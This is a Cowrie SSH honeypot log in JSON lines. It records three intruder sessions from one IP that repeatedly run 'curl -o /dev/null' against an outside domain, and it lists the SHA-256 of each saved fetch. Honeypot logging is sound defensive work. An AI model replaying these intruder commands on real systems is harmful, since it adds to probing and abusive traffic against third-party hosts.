{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.753362Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.753966Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.755501Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.756060Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.760958Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.762005Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.762861Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.792045Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.792711Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.796193Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.798034Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.798836Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.800829Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.801598Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.829656Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.831516Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.834362Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.835148Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.835588Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.837398Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.837960Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.840603Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.841018Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.842638Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.880275Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.882842Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.885251Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.886328Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.891553Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.893684Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.894896Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.896732Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.897573Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.930006Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.931080Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.931675Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.935285Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.938196Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.939299Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.944502Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.945568Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.946128Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.982095Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.983097Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.986097Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.987233Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.991717Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.021013Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.021731Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.057437Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.059988Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.063069Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.065772Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.069074Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.070223Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.074637Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.075126Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.076337Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.076962Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.113987Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.115148Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.115722Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.118577Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.119622Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.122404Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.123804Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.153863Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.154961Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.155487Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.157773Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.158492Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.170141Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.173598Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.174117Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.198281Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.200316Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.200906Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.203383Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.204073Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.206467Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.209996Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.213719Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:53.236260Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:53.236947Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
